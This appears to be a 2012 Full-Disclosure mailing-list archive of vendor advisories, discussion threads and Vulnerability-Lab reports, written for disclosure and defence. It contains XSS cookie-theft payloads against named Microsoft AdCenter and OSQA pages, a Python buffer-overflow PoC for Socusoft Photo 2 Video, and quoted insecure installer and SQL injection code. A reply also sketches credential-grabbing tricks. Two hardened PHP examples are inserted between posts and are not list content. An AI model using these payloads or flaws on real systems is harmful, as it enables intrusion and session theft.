Re: [Full-disclosure] Eleventh Circuit Finds Fifth Amendment Right Against Self Incrimination Protects Against Being Forced to Decrypt Hard Drive Contents
This isn't anything new

On Sun, Feb 26, 2012 at 11:58 PM, Laurelai laure...@oneechan.org wrote:
> http://www.ca11.uscourts.gov/opinions/ops/201112268.pdf

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2414-2] fex regression
Debian Security Advisory DSA-2414-2                    secur...@debian.org
http://www.debian.org/security/                                 Nico Golde
February 25, 2012                       http://www.debian.org/security/faq

Package        : fex
Vulnerability  : insufficient input sanitization
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0869

It was discovered that the last security update for F*X, DSA-2414-1, introduced a regression. Updated packages are now available to address this problem.

For the stable distribution (squeeze), this problem has been fixed in version 20100208+debian1-1+squeeze3.

The testing (wheezy) and unstable (sid) distributions are not affected by this problem.

We recommend that you upgrade your fex packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] pidgin OTR information leakage
Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.

Pidgin is a popular Instant Messenger application that runs on a wide variety of platforms including Windows and Linux. The pidgin-otr plugin enables users to communicate securely over any Instant Messenger network using the “Off-the-record” messaging protocol.

If Pidgin is compiled with DBUS support and there is a DBUS session daemon running on the system, then all messages that are typed into Pidgin and messages received through Pidgin are broadcasted on DBUS. The reasoning behind this is to allow for third party applications, such as desktop widgets to process these messages (e.g. create an animation when a message arrives). However, among the messages transmitted over DBUS one also finds OTR conversations in plaintext form. This is a security problem, as the private OTR messages may leak to other (unrelated) processes that are executing with the Pidgin user’s rights.

A more detailed advisory and proof-of-concept script can be found here:
http://census-labs.com/news/2012/02/25/pidgin-otr-info-leak/

The Pidgin and pidgin-otr development teams have been contacted about this issue and we anticipate a fix in a coordinated future release.

The Common Vulnerabilities and Exposures (CVE) project has assigned candidate name CVE-2012-1257 to this issue.

Disclosure Timeline
---
Vendor Contact(s):  December 20th, 2011
CVE assignment:     February 21st, 2012
Public Disclosure:  February 25th, 2012

Kind regards,
Dimitris Glynos
--
http://census-labs.com -- IT security research, development and services
[Full-disclosure] DeepSec Sector v6 - Call for Papers
--- DeepSec 2012 Sector v6 - Call for Papers

We are looking for talks and trainings for the DeepSec In-Depth Security Conference 2012 (Sector 6). We invite researchers, developers, auditors and everyone else dealing with information security to submit their work. We offer slots for talks and workshops, and we encourage everyone working on projects to present their results and findings.

Please visit our updated website for more details about the venue, the schedule and information about our past conferences: https://deepsec.net/

The DeepSec offers a mix of different topics and aspects like current threats and vulnerabilities, social engineering and psychological aspects as well as security management and philosophy. Our speakers and trainers traditionally come from the security community, companies, hacker spaces, journalism and academic organisations.

You can submit content for three categories:
- Talks for the conference (45 minute slots)
- Two day workshops
- U21 (a special category for young security researchers)

https://deepsec.net/cfp

--- Talks:

To make it short, talks should be up-to-date, of a high quality that matches our previous years and preferably exclusive (which of course is not a hard requirement but it will be one evaluation criterion).

Topics from all security disciplines are welcome but we encourage you to submit talks about emerging technologies and concepts like these (in alphabetical order):
- Cloud computing and virtualisation
- Design flaws (defective by design or even secure by design)
- IPv6 (again, until protocol designers get it right)
- Mobile computing and communications
- Risk assessment
- Security intelligence
- Security management and IT governance
- Topics that have a high impact on IT security

Talks must not:
- Endorse products, vendors or specific solutions
- Discredit anyone or anything, let's be fair

Speaker privileges:
- Free entrance to the conference
- Hotel accommodation for three nights (single/double room)
- Travel expenses up to EUR 800,-
- Invitation to our famous Speaker's Dinner with genuine Austrian food

--- Workshops:

We look for highest quality and most current topics. We had very good feedback for our workshops in the past and we want to keep it that way. Our audience has a very high level of technical understanding and is deeply involved with security management, implementation, operation and research.

What we like to see:
- Applied cryptography
- In-depth workshops on securing infrastructure or systems therein
- Mobile communications, vulnerabilities and defences
- Protocol and software development/design
- Social engineering and psychological aspects

Workshops should not:
- Cover too much (two days sounds a lot, but isn't)
- Focus on specific vendors or products
- Teach too much basic stuff (keep the level sufficiently high)

Trainer privileges:
- Free entrance to the conference
- Invitation to our famous Speaker's Dinner with Austrian food
- 50% of the net profit of your class

--- U21 category:

We don't take the age as seriously as it might sound but this category is especially for young security researchers who are *not* working in a professional sense yet, e.g. (full-time) students, or attending college, technical school or just interested in computer security. We will also accept submissions if you are a little bit older than 21 years. Don't be shy if your idea is not groundbreaking or not the top vulnerability discovered in the last 5 years. There's always room for some extra hacking and we'd be happy to provide a basis for breakthroughs. :)

We want to encourage you to submit your _own_ research. We will ask some questions and evaluate your submission, so don't cheat.

What we like to see:
- anything that is your own idea and/or implementation
- a valuable extension to existing ideas and/or implementations
- anything you have discovered on your own and is not discussed a lot yet or has been accepted as a CVE (common exploit and vulnerability)

Please don't:
- Implement something which has been around for long
- Reuse something existing

U21 privileges:
- A 15 minute lightning talk on the conference
- Free entrance to the conference
- Invitation to the Speaker's Dinner, but no alcohol without age check ;)
- We help you with your travel expenses to Vienna, but cannot cover the full speakers allowance, if in doubt talk to us we can work something out.

All CfP submissions must go through the form on our web site: https://deepsec.net/cfp.html

Please make sure that you read http://blog.deepsec.net/?p=294 before submitting your ideas. Practice is never a bad thing. :)

We will support anyone if you have questions, need clarification, whatever, just contact us for additional questions: c...@deepsec.net

--
In-Depth Security Conference 2012 - DeepSec 2012
November 27th to 30th 2012
https://deepsec.net/
Venue: Renaissance Penta Vienna Hotel - Austria
DeepSec GmbH - FN 294621 t - Handelsgericht Wien
Re: [Full-disclosure] pidgin OTR information leakage
On 02/25/2012 06:31 PM, Dimitris Glynos wrote:
> Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.

As noted by Peter Lawler this should really be referenced as a libpurple issue and not a pidgin one. You may find the updated advisory here:

http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/
(old URL is valid too)

Best regards,
Dimitris Glynos
--
http://census-labs.com -- IT security research, development and services
[Full-disclosure] Best DoS Tool
Hi List!!

I made some research about DoS Tools for my regular PenTesting. What is considered the best tool for DoS? I made some tests with scapy with good results.

Waiting for your comments,

Best Regards
Manuel Moreno
Re: [Full-disclosure] Best DoS Tool
On Mon, Feb 27, 2012 at 4:35 AM, Manuel Moreno insecurech...@gmail.com wrote:
> Hi List!! I made some research about DoS Tools for my regular PenTesting. What is considered the best tool for DoS? I made some tests with scapy with good results.

Wouldn't the purpose of your research be to answer that question?

--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
[Full-disclosure] [ MDVSA-2012:023 ] libvpx
Mandriva Linux Security Advisory                         MDVSA-2012:023
http://www.mandriva.com/security/
___

Package : libvpx
Date    : February 27, 2012
Affected: 2010.1, 2011.
___

Problem Description:

A vulnerability has been found and corrected in libvpx:

VP8 Codec SDK (libvpx) before 1.0.0 Duclair allows remote attackers to cause a denial of service (application crash) via (1) unspecified corrupt input or (2) by starting decoding from a P-frame, which triggers an out-of-bounds read, related to the clamping of motion vectors in SPLITMV blocks (CVE-2012-0823).

The updated packages have been patched to correct this issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0823
___

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
___

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: [Full-disclosure] Pandora FMS v4.0.1 - Local File Include Vulnerability
On Fri, Feb 17, 2012 at 01:32:19AM +0100, resea...@vulnerability-lab.com wrote:
> Title: Pandora FMS v4.0.1 - Local File Include Vulnerability
> Date: 2012-02-17
> References: http://www.vulnerability-lab.com/get_content.php?id=435
> VL-ID: 435
> Report-Timeline:
> 2012-02-01: Vendor Notification
> 2012-02-17: Public or Non-Public Disclosure

How did vendor respond? Is this fixed by vendor?

- Henri Salo
[Full-disclosure] [SECURITY] [DSA 2418-1] postgresql-8.4 security update
Debian Security Advisory DSA-2418-1                    secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
February 27, 2012                       http://www.debian.org/security/faq

Package        : postgresql-8.4
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0866 CVE-2012-0867 CVE-2012-0868

Several local vulnerabilities have been discovered in PostgreSQL, an object-relational SQL database. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2012-0866

    It was discovered that the permissions of a function called by a trigger are not checked. This could result in privilege escalation.

CVE-2012-0867

    It was discovered that only the first 32 characters of a host name are checked when validating host names through SSL certificates. This could result in spoofing the connection in limited circumstances.

CVE-2012-0868

    It was discovered that pg_dump did not sanitise object names. This could result in arbitrary SQL command execution if a malformed dump file is opened.

For the stable distribution (squeeze), this problem has been fixed in version 8.4.11-0squeeze1.

For the unstable distribution (sid), this problem has been fixed in version 8.4.11-1.

We recommend that you upgrade your postgresql-8.4 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Re: [Full-disclosure] Eleventh Circuit Finds Fifth Amendment Right Against Self Incrimination Protects Against Being Forced to Decrypt Hard Drive Contents
On Mon, 27 Feb 2012 01:38:56 MST, Sanguinarious Rose said:
> This isn't anything new

Yeah, the decision was released all the way back on Feb 23, four whole days ago, that's practically last century in Internet time...

So tell me - what's your definition of new (obviously significantly less than 4 days), and how does it affect threads on F-D that last longer than 4 days?
[Full-disclosure] Microsoft AdCenter Service - Cross Site Vulnerabilities
Title:
======
Microsoft AdCenter Service - Cross Site Vulnerabilities

Date:
=====
2012-02-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=447
MSRC ID: 12223

VL-ID:
======
447

Introduction:
=============
Microsoft adCenter (formerly MSN adCenter), is the division of the Microsoft Network (MSN) responsible for MSN's advertising services. Microsoft adCenter provides pay per click advertisements. This is a service aimed at people who want to advertise a product. Microsoft also has a (still in beta) service for webmasters who want to monetize on their site: Microsoft pubCenter. Search and display advertising solutions for small businesses and large advertisers and agencies on Bing and Yahoo! Search, MSN, Windows Live, Xbox Co.

(Copy of the Vendor Website: http://advertising.microsoft.com/home)

Abstract:
=========
The Vulnerability-Lab Team discovered multiple non-persistent cross site scripting vulnerabilities on Microsoft's AdCenter website application.

Report-Timeline:
================
2012-02-18: Vendor Notification
2012-02-19: Vendor Response/Feedback
2012-02-26: Vendor Fix/Patch
2012-02-27: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A non persistent cross site scripting vulnerability is detected on Microsoft's AdCenter website application. The vulnerability allows a remote attacker with required user interaction to hijack customer sessions via cross site scripting. Successful exploitation can result in account steal, client side phishing or session hijacking.

Vulnerable Module(s):
[+] austra123; media brands; tv

Picture(s):
../1.png
../2.png
../3.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with high required user interaction. For demonstration or reproduce ...

advertising.microsoft.com/austra123%27;alert%28document.cookie%29;a=%27
advertising.microsoft.com/media-brands';alert(document.cookie);a='
advertising.microsoft.com/tv';alert(document.cookie);a='

Reference(s):
advertising.microsoft.com/austra123
advertising.microsoft.com/media-brands
advertising.microsoft.com/tv

Risk:
=====
The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+).

Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
[Full-disclosure] Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability
Title:
======
Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability

Date:
=====
2012-02-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=460

VL-ID:
======
460

Introduction:
=============
Socusoft photo to video converter Professional allows you to create all kinds of eye-catching slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264, h.264 HD, 3gp, 3gpp2, swf ) playable on YouTube, Facebook, MySpace, iPod, iPad, iphone, Archos, PSP, Zune. With the powerful Photo to Video Converter Professional, you could convert photo to the animating and dynamic video and share the video on YouTube, Facebook, MySpace, iPod, iPad, iPhone. With just a few minutes of work, you'll have an eye-catching slideshow video with background music and dynamic panzoom and attractive transition effects. This powerful Photo to Video Converter Professional supports Over 260 animating transition effects with Pan Zoom effect.

(Copy of the Vendor Homepage: )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Socusoft's Photo to Video Converter Free and Professional v8.05

Report-Timeline:
================
2012-02-27: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Socusoft Photo 2 Video v8.05

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A Buffer Overflow vulnerability is detected on Socusoft Photo to Video Converter Free and Professional v8.05 (current version). The vulnerability is located in the pdmlog.dll. Successful exploitation can result in execution of code, overwrite of registers system compromise.

Vulnerable DLL(s):
[+] pdmlog.dll

--- Registers ---
# EAX 42424242
# EBX 0036 pdmlog.dll:0036
# ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B
# EDX 80284006
# ESI 0002
# EDI
# EBP 01C5FC0C Stack[01AC]:01C5FC0C
# ESP 01C5FBF0 Stack[01AC]:01C5FBF0
# EIP 42424242
# EFL 00010206

--- Stack ---
# 01C5FBE0
# 01C5FBE4 0002
# 01C5FBE8 94B7
# 01C5FBEC 0001
# 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F - Crash
# 01C5FBF4 0036 pdmlog.dll:0036
# 01C5FBF8 0002
# 01C5FBFC
# 01C5FC00
# 01C5FC04 01C5FC20 Stack[01AC]:01C5FC20
# 01C5FC08 7FFDE000 debug066:7FFDE000

--- Dump ---
# 00370584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 00370594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 003705A4 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43
# 003705B4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43
# 003705C4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43

Picture(s):
../1.png

Proof of Concept:
=================
The Vulnerability can be exploited by local attackers. For demonstration or reproduce ...

#!/usr/bin/python
# Exploit Title: Socusoft Photo to Video Converter Free/Pro v8.05 (pdmlog.dll) Local Buffer Overflow PoC
# Version: 8.05
# Date: 2012-02-26
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.socusoft.com
# Tested on: Windows XP SP3 Professional German
# Notes: Overflow occurs in pdmlog.dll
# Howto: Import Reg - Start App

# EAX 42424242
# EBX 0036 pdmlog.dll:0036
# ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B
# EDX 80284006
# ESI 0002
# EDI
# EBP 01C5FC0C Stack[01AC]:01C5FC0C
# ESP 01C5FBF0 Stack[01AC]:01C5FBF0
# EIP 42424242
# EFL 00010206

# 01C5FBE0
# 01C5FBE4 0002
# 01C5FBE8 94B7
# 01C5FBEC 0001
# 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F - Crash
# 01C5FBF4 0036 pdmlog.dll:0036
# 01C5FBF8 0002
# 01C5FBFC
# 01C5FC00
# 01C5FC04 01C5FC20 Stack[01AC]:01C5FC20
# 01C5FC08 7FFDE000 debug066:7FFDE000

file="poc.reg"

junk1="\x41" * 548
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\\Software\\Socusoft Photo to Video Converter Free Version\\General]\n"
poc=poc + "\"TempFolder\"=\"" + junk1 + boom + junk2 + "\""

try:
    print("[*] Creating exploit file...\n")
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print("[*] File successfully created!")
except:
    print("[!] Error while creating file!")

Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(-).

Credits:
========
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]
[Full-disclosure] OSQA CMS v3b - Multiple Persistent Vulnerabilities
Title:
======
OSQA CMS v3b - Multiple Web Vulnerabilities

Date:
=====
2012-02-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=461

VL-ID:
======
461

Introduction:
=============
OSQA is the Open Source QA System. It is free software licensed under the GPL, and you can download the source code for OSQA from our Subversion server. OSQA is originally based on CNProg, an excellent Chinese QA web application written by Mike Chen and Sailing Cai. OSQA is written in Python and powered by the Django application framework.

Abstract:
=========
The Vulnerability Lab Research Team discovered multiple persistent Input Validation Vulnerabilities on OSQA's CMS v3b.

Report-Timeline:
================
2012-02-27: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent cross site scripting vulnerabilities are detected on OSQA's CMS v3b. The vulnerability allows remote attackers to hijack customer, moderator or admin sessions with high required user interaction or local low privileged user account medium required user interaction. Successful exploitation can result in account steal, phishing application-side content request manipulation.

Vulnerable Module(s):
[+] Url Bar
[+] Picture Bar
[+] Blockquote

Proof of Concept:
=================
The vulnerabilities can be exploited by local low privileged user accounts or remote attackers with high required user interaction. For demonstration or reproduce ...

XSS #1
http://localhost/questions/ask/
press url bar
put xss code img src=img src=search/onerror=alert(xss)//

XSS #2
http://localhost/questions/ask/
press picture bar
put xss code img src=img src=search/onerror=alert(xss)//

Risk:
=====
The security risk of the cross site scripting vulnerabilities are estimated as medium(-).

Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili ( longrifle0x )
[Full-disclosure] Wolf CMS v0.7.5 - Multiple Web Vulnerabilities
Title:
======
Wolf CMS v0.7.5 - Multiple Web Vulnerabilities

Date:
=====
2012-02-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=452

VL-ID:
======
452

Introduction:
=============
Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS. The project was a finalist in the 2010 Packt Publishing's Open Source awards for the Most Promising Open Source Project category. As of the 28th of December 2010, the Wolf CMS code repository was moved from Google Code to Github.

( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS )

Abstract:
=========
Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities on the Wolf Content Management System v0.7.5

Report-Timeline:
================
2012-02-11: Vendor Notification
2012-02-27: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
BlueWin CH
Product: Wolf CMS v0.7.5

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
A SQL Injection vulnerability is detected on the Wolf Content Management System v0.7.5. The vulnerability allows a remote attacker to execute own sql commands on the affected application dbms. Successful exploitation can result in dbms, web-server or application compromise.

Vulnerable Module(s):
[+] /plugins/comment/[Index]

Picture(s):
../1.png

1.2
Multiple persistent vulnerabilities are detected on the Wolf Content Management System v0.7.5. The bug allows a remote attacker or local low privileged user account to inject persistent malicious script code on application side. Successful exploitation can result in persistent context manipulation on requests, session hijacking account steal via application side phishing.

Vulnerable Module(s):
[+] /plugins/comment/

Picture(s):
../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers local low privileged user accounts with- and without required user interaction. For demonstration or reproduce ...

1.1
Path: /wolfcms/wolf/plugins/comment/
File: index.php

Review:
271: $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR']:($_SERVER['REMOTE_ADDR']);

1.2
Path: /wolfcms/wolf/plugins/comment/
File: index.php

Review: /wolfcms/wolf/plugins/comment/index.php
272: echo '<input type="hidden" value="'.$ip.'" name="comment[author_ip]" />';

Risk:
=====
1.1
The security risk of the blind sql injection vulnerabilities are estimated as high(+).

1.2
The security risk of the persistent xss vulnerabilities are estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili M. (longrifle0x)
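A hardened counterpart to lines 271 and 272 quoted in the Wolf CMS advisory above, as an added example that is not Wolf CMS code and not the vendor's fix. The helper names, the trusted-proxy list, the `comment` table layout and all addresses are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not Wolf CMS code.

/**
 * Resolve the commenter's address. X-Forwarded-For is honoured only when the
 * TCP peer (REMOTE_ADDR) is a reverse proxy we operate, and every value is
 * validated as an IP literal before it is used anywhere.
 */
function comment_client_ip(array $server, array $trustedProxies = []): string
{
    $peer = (string)($server['REMOTE_ADDR'] ?? '');
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0'; // CLI run or malformed environment
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? null;
    if (!is_string($xff) || !in_array($peer, $trustedProxies, true)) {
        return $peer; // header ignored: the peer is not our proxy
    }
    // The header is a comma-separated chain. Walk it right to left and take
    // the first hop that is not one of our own proxies.
    foreach (array_reverse(explode(',', $xff)) as $hop) {
        $hop = trim($hop);
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            return $peer; // malformed chain: fall back to the peer address
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $peer;
}

/** Escape the address for an HTML attribute, if it is displayed at all. */
function comment_ip_attr(string $ip): string
{
    return htmlspecialchars($ip, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Store a comment. The address is computed on the server at insert time and
 * bound as a parameter; an author_ip value sent by the browser is ignored,
 * so no hidden form field is needed.
 */
function save_comment(PDO $db, array $post, array $server, array $trustedProxies = []): void
{
    $stmt = $db->prepare(
        'INSERT INTO comment (author_name, body, author_ip) VALUES (:name, :body, :ip)'
    );
    $stmt->execute([
        ':name' => (string)($post['author_name'] ?? ''),
        ':body' => (string)($post['body'] ?? ''),
        ':ip'   => comment_client_ip($server, $trustedProxies),
    ]);
}

// --- Demonstration with constructed requests (in-memory SQLite) ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comment (author_name TEXT, body TEXT, author_ip TEXT)');

// 1. Direct client that forges the header with quotes and markup.
$forged = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => "'\"><b>not-an-ip</b>",
];
// 2. Request relayed by our own proxy at 10.0.0.5 (constructed address).
$proxied = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.23, 10.0.0.5',
];
// The browser-supplied author_ip is present but never read.
$post = ['author_name' => 'alice', 'body' => 'hi', 'author_ip' => '192.0.2.99'];

save_comment($db, $post, $forged);
save_comment($db, $post, $proxied, ['10.0.0.5']);

foreach ($db->query('SELECT author_ip FROM comment') as $row) {
    echo comment_ip_attr($row['author_ip']), PHP_EOL;
}
```

The forged header never reaches the database or the page: the first row stores the peer address and the second stores the client address reported by the trusted proxy.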
[Full-disclosure] COPS substitute
Hi! I was guessing which program could be the current substitute of COPS ( http://en.wikipedia.org/wiki/COPS_(software) ), because this one is obsolete.

Thanks!
Adrian
[Full-disclosure] Fwd: Case YVS Image Gallery
I'm just forwarding this for you. Hope you enjoy :)

-------- Original Message --------
Subject: [oss-security] Case YVS Image Gallery
Date: Mon, 27 Feb 2012 13:32:52 +0200
From: Henri Salo he...@nerv.fi
Reply-To: oss-secur...@lists.openwall.com
To: oss-secur...@lists.openwall.com
Cc: corry...@gmail.com, bugt...@securityfocus.com

http://osvdb.org/show/osvdb/79477

The software YVS Image Gallery seems to be full of security issues. For example one can have lots of fun with this. Copy from installation.php:

    case(isset($_POST['db_name'])):
        $host = $_POST['host'];
        $db_name = $_POST['db_name'];
        $db_user_name = $_POST['db_user_name'];
        $db_password = $_POST['db_password'];
        $admin_name = $_POST['admin_name'];
        $admin_password = $_POST['admin_password'];
        $o_host = $_POST['o_host'];
        $o_db_name = $_POST['o_db_name'];
        $o_db_user_name = $_POST['o_db_user_name'];
        $o_db_password = $_POST['o_db_password'];

        //read in the file
        $file = "../functions/db_connect.php";
        $fh = fopen($file, 'r+');
        $contents = fread($fh, filesize($file));

        //set up the text to change
        $text_to_change = array();
        $new_text = array();
        $text_to_change[] = '$dbhost="'.$o_host.'"';
        $text_to_change[] = '$dbuser="'.$o_db_user_name.'"';
        $text_to_change[] = '$dbpass="'.$o_db_password.'"';
        $text_to_change[] = '$dbname="'.$o_db_name.'"';
        $new_text[] = '$dbhost="'.$host.'"';
        $new_text[] = '$dbuser="'.$db_user_name.'"';
        $new_text[] = '$dbpass="'.$db_password.'"';
        $new_text[] = '$dbname="'.$db_name.'"';
        $new_contents = str_replace($text_to_change, $new_text, $contents);
        fclose($fh);

        // Open file to write
        $fh = fopen($file, 'r+');
        fwrite($fh, $new_contents);
        fclose($fh);

        //set up new admin user
        include '../functions/db_connect.php';
        db_connect();

I'll bet this software is not used much, but I can list all problems I can find if we want to assign CVE-identifiers to cases like these. No contact information of developer found. Any ideas how to get these fixed or get the code out of internet?
The package is also hosted in here: http://www.hotscripts.com/listing/yvs-image-gallery/ (and probably others).

--
Henri Salo
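The quoted installation.php splices request fields into a PHP source file and then includes it, with no check that installation has already happened. As an added example, not code from YVS Image Gallery or from the post, here is an installer step that stores the same settings as data and runs only once; the file names, the lock-file scheme and the validation patterns are assumptions.

```php
<?php
// Added example, not YVS Image Gallery code. db_config.php, installed.lock
// and the validation patterns are assumptions made for illustration.

/** Validate installer input and return PHP source that holds only data. */
function render_db_config(array $in): string
{
    $rules = [
        'host'         => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'db_name'      => '/^[A-Za-z0-9_]{1,64}$/',
        'db_user_name' => '/^[A-Za-z0-9_]{1,32}$/',
    ];
    $cfg = [];
    foreach ($rules as $key => $pattern) {
        $value = $in[$key] ?? '';
        if (!is_string($value) || preg_match($pattern, $value) !== 1) {
            throw new InvalidArgumentException("invalid $key");
        }
        $cfg[$key] = $value;
    }
    // A password may contain any character, so it is not pattern-matched.
    // var_export() escapes quotes and backslashes, so it stays a string literal.
    $password = $in['db_password'] ?? '';
    if (!is_string($password)) {
        throw new InvalidArgumentException('invalid db_password');
    }
    $cfg['db_password'] = $password;
    return "<?php\nreturn " . var_export($cfg, true) . ";\n";
}

/** Write the config once; later calls are refused. */
function install(string $dir, array $post): bool
{
    $source = render_db_config($post);            // validate before touching disk
    $lock   = @fopen("$dir/installed.lock", 'x'); // 'x' fails if the file exists
    if ($lock === false) {
        return false;
    }
    fclose($lock);
    $tmp = tempnam($dir, 'cfg');
    file_put_contents($tmp, $source);
    chmod($tmp, 0600);
    return rename($tmp, "$dir/db_config.php");    // atomic replace
}

// Constructed input: the password carries quote characters on purpose.
$dir = sys_get_temp_dir() . '/installer_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
$post = [
    'host'         => 'localhost',
    'db_name'      => 'gallery',
    'db_user_name' => 'gallery',
    'db_password'  => "pa'ss\"; //",
];
var_dump(install($dir, $post));                  // first run writes the file
$cfg = include "$dir/db_config.php";
var_dump($cfg['db_password'] === $post['db_password']);
var_dump(install($dir, $post));                  // second run is refused
```

Deleting the installer script after setup, or serving it only to an authenticated administrator, closes the same gap at the web-server level.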
Re: [Full-disclosure] Best DoS Tool
Good one - http://t50.sourceforge.net/

On Mon, Feb 27, 2012 at 8:35 AM, Ferenc Kovacs tyr...@gmail.com wrote:
> On Mon, Feb 27, 2012 at 4:35 AM, Manuel Moreno insecurech...@gmail.com wrote:
>> Hi List!! I made some research about DoS Tools for my regular PenTesting. What is considered the best tool for DoS? I made some test with scapy with good results.
>
> Wouldn't be the purpose of your research to answer that question?
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu

--
Ћiago ₢uz
Re: [Full-disclosure] pidgin OTR information leakage
2012/2/25 Dimitris Glynos dimit...@census-labs.com:
> Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.

Basically, you're saying that if I have the rights of a user on a machine, I can access the private conversations of that user? Ooooh no. Well, I can also copy his keyfiles, no? And I can alter his settings. And spawn fake "Update didn't work, please enter root password to proceed" windows. I could alter his ~/.bashrc so that whenever he launches sudo or su, a script is launched instead that grabs his password.

So, please, what's the point?
Re: [Full-disclosure] pidgin OTR information leakage
Jann Horn wrote:
> 2012/2/25 Dimitris Glynos dimit...@census-labs.com:
>> Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.
>
